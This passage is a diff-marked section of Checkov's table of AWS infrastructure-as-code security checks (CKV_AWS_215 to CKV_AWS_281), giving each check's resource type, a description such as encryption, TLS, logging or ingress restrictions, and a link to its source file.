-|  607 | CKV_AWS_215              | resource                         | aws_appsync_api_cache                                                                            | Ensure AppSync API Cache is encrypted in transit                                                                                                                                                         | Terraform               | [AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py)                                                   |
-|  608 | CKV_AWS_216              | resource                         | aws_cloudfront_distribution                                                                      | Ensure CloudFront distribution is enabled                                                                                                                                                                | Terraform               | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py)                                                             |
-|  609 | CKV_AWS_217              | resource                         | aws_api_gateway_deployment                                                                       | Ensure Create before destroy for API deployments                                                                                                                                                         | Terraform               | [APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py)                                         |
-|  610 | CKV_AWS_218              | resource                         | aws_cloudsearch_domain                                                                           | Ensure that CloudSearch is using latest TLS                                                                                                                                                              | Terraform               | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py)                                                                               |
-|  611 | CKV_AWS_219              | resource                         | aws_codepipeline                                                                                 | Ensure CodePipeline Artifact store is using a KMS CMK                                                                                                                                                    | Terraform               | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py)                                                           |
-|  612 | CKV_AWS_220              | resource                         | aws_cloudsearch_domain                                                                           | Ensure that CloudSearch is using https                                                                                                                                                                   | Terraform               | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py)                                                             |
-|  613 | CKV_AWS_221              | resource                         | aws_codeartifact_domain                                                                          | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK)                                                                                                                        | Terraform               | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py)                                                   |
-|  614 | CKV_AWS_222              | resource                         | aws_dms_replication_instance                                                                     | Ensure DMS replication instance gets all minor upgrade automatically                                                                                                                                     | Terraform               | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py)                                                   |
-|  615 | CKV_AWS_223              | resource                         | aws_ecs_cluster                                                                                  | Ensure ECS Cluster enables logging of ECS Exec                                                                                                                                                           | Terraform               | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py)                                                                       |
-|  616 | CKV_AWS_224              | resource                         | aws_ecs_cluster                                                                                  | Ensure ECS Cluster logging uses CMK                                                                                                                                                                      | Terraform               | [ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py)                                                     |
-|  617 | CKV_AWS_225              | resource                         | aws_api_gateway_method_settings                                                                  | Ensure API Gateway method setting caching is enabled                                                                                                                                                     | Terraform               | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py)                                               |
-|  618 | CKV_AWS_226              | resource                         | aws_db_instance                                                                                  | Ensure DB instance gets all minor upgrades automatically                                                                                                                                                 | Terraform               | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py)                                                                           |
-|  619 | CKV_AWS_226              | resource                         | aws_rds_cluster_instance                                                                         | Ensure DB instance gets all minor upgrades automatically                                                                                                                                                 | Terraform               | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py)                                                                           |
-|  620 | CKV_AWS_227              | resource                         | aws_kms_key                                                                                      | Ensure KMS key is enabled                                                                                                                                                                                | Terraform               | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py)                                                                                         |
-|  621 | CKV_AWS_228              | resource                         | aws_elasticsearch_domain                                                                         | Verify Elasticsearch domain is using an up to date TLS policy                                                                                                                                            | Terraform               | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py)                                                                           |
-|  622 | CKV_AWS_228              | resource                         | aws_opensearch_domain                                                                            | Verify Elasticsearch domain is using an up to date TLS policy                                                                                                                                            | Terraform               | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py)                                                                           |
-|  623 | CKV_AWS_229              | resource                         | aws_network_acl                                                                                  | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21                                                                                                                                                   | Terraform               | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py)                                                         |
-|  624 | CKV_AWS_229              | resource                         | aws_network_acl_rule                                                                             | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21                                                                                                                                                   | Terraform               | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py)                                                         |
-|  625 | CKV_AWS_230              | resource                         | aws_network_acl                                                                                  | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20                                                                                                                                                   | Terraform               | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py)                                                         |
-|  626 | CKV_AWS_230              | resource                         | aws_network_acl_rule                                                                             | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20                                                                                                                                                   | Terraform               | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py)                                                         |
-|  627 | CKV_AWS_231              | resource                         | aws_network_acl                                                                                  | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                                 | Terraform               | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py)                                                     |
-|  628 | CKV_AWS_231              | resource                         | aws_network_acl_rule                                                                             | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                                 | Terraform               | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py)                                                     |
-|  629 | CKV_AWS_232              | resource                         | aws_network_acl                                                                                  | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22                                                                                                                                                   | Terraform               | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py)                                                         |
-|  630 | CKV_AWS_232              | resource                         | aws_network_acl_rule                                                                             | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22                                                                                                                                                   | Terraform               | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py)                                                         |
-|  631 | CKV_AWS_233              | resource                         | aws_acm_certificate                                                                              | Ensure Create before destroy for ACM certificates                                                                                                                                                        | Terraform               | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py)                                                                   |
-|  632 | CKV_AWS_234              | resource                         | aws_acm_certificate                                                                              | Verify logging preference for ACM certificates                                                                                                                                                           | Terraform               | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py)                                                                 |
-|  633 | CKV_AWS_235              | resource                         | aws_ami_copy                                                                                     | Ensure that copied AMIs are encrypted                                                                                                                                                                    | Terraform               | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py)                                                                                   |
-|  634 | CKV_AWS_236              | resource                         | aws_ami_copy                                                                                     | Ensure AMI copying uses a CMK                                                                                                                                                                            | Terraform               | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py)                                                                                           |
-|  635 | CKV_AWS_237              | resource                         | aws_api_gateway_rest_api                                                                         | Ensure Create before destroy for API Gateway                                                                                                                                                             | Terraform               | [APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py)                                                             |
-|  636 | CKV_AWS_238              | resource                         | aws_guardduty_detector                                                                           | Ensure that GuardDuty detector is enabled                                                                                                                                                                | Terraform               | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py)                                                                       |
-|  637 | CKV_AWS_239              | resource                         | aws_dax_cluster                                                                                  | Ensure DAX cluster endpoint is using TLS                                                                                                                                                                 | Terraform               | [DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py)                                                                                           |
-|  638 | CKV_AWS_240              | resource                         | aws_kinesis_firehose_delivery_stream                                                             | Ensure Kinesis Firehose delivery stream is encrypted                                                                                                                                                     | Terraform               | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py)                                                       |
-|  639 | CKV_AWS_241              | resource                         | aws_kinesis_firehose_delivery_stream                                                             | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK                                                                                                                                     | Terraform               | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py)                                               |
-|  640 | CKV_AWS_242              | resource                         | aws_mwaa_environment                                                                             | Ensure MWAA environment has scheduler logs enabled                                                                                                                                                       | Terraform               | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py)                                                                       |
-|  641 | CKV_AWS_243              | resource                         | aws_mwaa_environment                                                                             | Ensure MWAA environment has worker logs enabled                                                                                                                                                          | Terraform               | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py)                                                                             |
-|  642 | CKV_AWS_244              | resource                         | aws_mwaa_environment                                                                             | Ensure MWAA environment has webserver logs enabled                                                                                                                                                       | Terraform               | [MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py)                                                                       |
-|  643 | CKV_AWS_245              | resource                         | aws_db_instance_automated_backups_replication                                                    | Ensure replicated backups are encrypted at rest using KMS CMKs                                                                                                                                           | Terraform               | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py)                                           |
-|  644 | CKV_AWS_246              | resource                         | aws_rds_cluster_activity_stream                                                                  | Ensure RDS Cluster activity streams are encrypted using KMS CMKs                                                                                                                                         | Terraform               | [RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py)                                       |
-|  645 | CKV_AWS_247              | resource                         | aws_elasticsearch_domain                                                                         | Ensure all data stored in the Elasticsearch is encrypted with a CMK                                                                                                                                      | Terraform               | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py)                                                           |
-|  646 | CKV_AWS_247              | resource                         | aws_opensearch_domain                                                                            | Ensure all data stored in the Elasticsearch is encrypted with a CMK                                                                                                                                      | Terraform               | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py)                                                           |
-|  647 | CKV_AWS_248              | resource                         | aws_elasticsearch_domain                                                                         | Ensure that Elasticsearch is not using the default Security Group                                                                                                                                        | Terraform               | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py)                                                                           |
-|  648 | CKV_AWS_248              | resource                         | aws_opensearch_domain                                                                            | Ensure that Elasticsearch is not using the default Security Group                                                                                                                                        | Terraform               | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py)                                                                           |
-|  649 | CKV_AWS_249              | resource                         | aws_ecs_task_definition                                                                          | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions                                                                                                           | Terraform               | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py)                                                                   |
-|  650 | CKV_AWS_250              | resource                         | aws_db_instance                                                                                  | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/)                                          | Terraform               | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py)                                                               |
-|  651 | CKV_AWS_250              | resource                         | aws_rds_cluster                                                                                  | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/)                                          | Terraform               | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py)                                                               |
-|  652 | CKV_AWS_251              | resource                         | aws_cloudtrail                                                                                   | Ensure CloudTrail logging is enabled                                                                                                                                                                     | Terraform               | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py)                                                                         |
-|  653 | CKV_AWS_252              | resource                         | aws_cloudtrail                                                                                   | Ensure CloudTrail defines an SNS Topic                                                                                                                                                                   | Terraform               | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py)                                                                     |
-|  654 | CKV_AWS_253              | resource                         | aws_dlm_lifecycle_policy                                                                         | Ensure DLM cross region events are encrypted                                                                                                                                                             | Terraform               | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py)                                                           |
-|  655 | CKV_AWS_254              | resource                         | aws_dlm_lifecycle_policy                                                                         | Ensure DLM cross region events are encrypted with Customer Managed Key                                                                                                                                   | Terraform               | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py)                                             |
-|  656 | CKV_AWS_255              | resource                         | aws_dlm_lifecycle_policy                                                                         | Ensure DLM cross region schedules are encrypted                                                                                                                                                          | Terraform               | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py)                                                       |
-|  657 | CKV_AWS_256              | resource                         | aws_dlm_lifecycle_policy                                                                         | Ensure DLM cross region schedules are encrypted using a Customer Managed Key                                                                                                                             | Terraform               | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py)                                         |
-|  658 | CKV_AWS_257              | resource                         | aws_codecommit_approval_rule_template                                                            | Ensure CodeCommit branch changes have at least 2 approvals                                                                                                                                               | Terraform               | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py)                                                 |
-|  659 | CKV_AWS_258              | resource                         | AWS::Lambda::Url                                                                                 | Ensure that Lambda function URLs AuthType is not None                                                                                                                                                    | Cloudformation          | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py)                                                                        |
-|  660 | CKV_AWS_258              | resource                         | aws_lambda_function_url                                                                          | Ensure that Lambda function URLs AuthType is not None                                                                                                                                                    | Terraform               | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py)                                                                             |
-|  661 | CKV_AWS_259              | resource                         | aws_cloudfront_response_headers_policy                                                           | Ensure CloudFront response header policy enforces Strict Transport Security                                                                                                                              | Terraform               | [CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py)                         |
-|  662 | CKV_AWS_260              | resource                         | AWS::EC2::SecurityGroup                                                                          | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Cloudformation          | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                              |
-|  663 | CKV_AWS_260              | resource                         | AWS::EC2::SecurityGroupIngress                                                                   | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Cloudformation          | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                              |
-|  664 | CKV_AWS_260              | resource                         | aws_security_group                                                                               | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                                   |
-|  665 | CKV_AWS_260              | resource                         | aws_security_group_rule                                                                          | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                                   |
-|  666 | CKV_AWS_260              | resource                         | aws_vpc_security_group_ingress_rule                                                              | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                                   |
-|  667 | CKV_AWS_261              | resource                         | aws_alb_target_group                                                                             | Ensure HTTP HTTPS Target group defines Healthcheck                                                                                                                                                       | Terraform               | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py)                                                       |
-|  668 | CKV_AWS_261              | resource                         | aws_lb_target_group                                                                              | Ensure HTTP HTTPS Target group defines Healthcheck                                                                                                                                                       | Terraform               | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py)                                                       |
-|  669 | CKV_AWS_262              | resource                         | aws_kendra_index                                                                                 | Ensure Kendra index Server side encryption uses CMK                                                                                                                                                      | Terraform               | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py)                                                                             |
-|  670 | CKV_AWS_263              | resource                         | aws_appflow_flow                                                                                 | Ensure AppFlow flow uses CMK                                                                                                                                                                             | Terraform               | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py)                                                                                           |
-|  671 | CKV_AWS_264              | resource                         | aws_appflow_connector_profile                                                                    | Ensure AppFlow connector profile uses CMK                                                                                                                                                                | Terraform               | [AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py)                                                           |
-|  672 | CKV_AWS_265              | resource                         | aws_keyspaces_table                                                                              | Ensure Keyspaces Table uses CMK                                                                                                                                                                          | Terraform               | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py)                                                                             |
-|  673 | CKV_AWS_266              | resource                         | aws_db_snapshot_copy                                                                             | Ensure DB Snapshot copy uses CMK                                                                                                                                                                         | Terraform               | [DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py)                                                                             |
-|  674 | CKV_AWS_267              | resource                         | aws_comprehend_entity_recognizer                                                                 | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK)                                                                                                  | Terraform               | [ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py)                                           |
-|  675 | CKV_AWS_268              | resource                         | aws_comprehend_entity_recognizer                                                                 | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK)                                                                                                 | Terraform               | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py)                                         |
-|  676 | CKV_AWS_269              | resource                         | aws_connect_instance_storage_config                                                              | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK                                                                                                                                     | Terraform               | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py)             |
-|  677 | CKV_AWS_270              | resource                         | aws_connect_instance_storage_config                                                              | Ensure Connect Instance S3 Storage Config uses CMK                                                                                                                                                       | Terraform               | [ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py)                                             |
-|  678 | CKV_AWS_271              | resource                         | aws_dynamodb_table_replica                                                                       | Ensure DynamoDB table replica KMS encryption uses CMK                                                                                                                                                    | Terraform               | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py)                                                           |
-|  679 | CKV_AWS_272              | resource                         | aws_lambda_function                                                                              | Ensure AWS Lambda function is configured to validate code-signing                                                                                                                                        | Terraform               | [LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py)                                                                 |
-|  680 | CKV_AWS_273              | resource                         | aws_iam_user                                                                                     | Ensure access is controlled through SSO and not AWS IAM defined users                                                                                                                                    | Terraform               | [IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py)                                                                         |
-|  681 | CKV_AWS_274              | resource                         | aws_iam_group_policy_attachment                                                                  | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform               | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                             |
-|  682 | CKV_AWS_274              | resource                         | aws_iam_policy_attachment                                                                        | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform               | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                             |
-|  683 | CKV_AWS_274              | resource                         | aws_iam_role                                                                                     | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform               | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                             |
-|  684 | CKV_AWS_274              | resource                         | aws_iam_role_policy_attachment                                                                   | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform               | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                             |
-|  685 | CKV_AWS_274              | resource                         | aws_iam_user_policy_attachment                                                                   | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform               | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                             |
-|  686 | CKV_AWS_274              | resource                         | aws_ssoadmin_managed_policy_attachment                                                           | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform               | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                             |
-|  687 | CKV_AWS_275              | data                             | aws_iam_policy                                                                                   | Disallow policies from using the AWS AdministratorAccess policy                                                                                                                                          | Terraform               | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py)                                                                                 |
-|  688 | CKV_AWS_276              | resource                         | aws_api_gateway_method_settings                                                                  | Ensure Data Trace is not enabled in API Gateway Method Settings                                                                                                                                          | Terraform               | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py)                                                     |
-|  689 | CKV_AWS_277              | resource                         | aws_security_group                                                                               | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py)                                                 |
-|  690 | CKV_AWS_277              | resource                         | aws_security_group_rule                                                                          | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py)                                                 |
-|  691 | CKV_AWS_277              | resource                         | aws_vpc_security_group_ingress_rule                                                              | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py)                                                 |
-|  692 | CKV_AWS_278              | resource                         | aws_memorydb_snapshot                                                                            | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK)                                                                                                                          | Terraform               | [MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py)                                                     |
-|  693 | CKV_AWS_279              | resource                         | aws_neptune_cluster_snapshot                                                                     | Ensure Neptune snapshot is securely encrypted                                                                                                                                                            | Terraform               | [NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py)                                                         |
-|  694 | CKV_AWS_280              | resource                         | aws_neptune_cluster_snapshot                                                                     | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK)                                                                                                                           | Terraform               | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py)                                           |
-|  695 | CKV_AWS_281              | resource                         | aws_redshift_snapshot_copy_grant                                                                 | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK)                                                                                                                     | Terraform               | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py)                       |
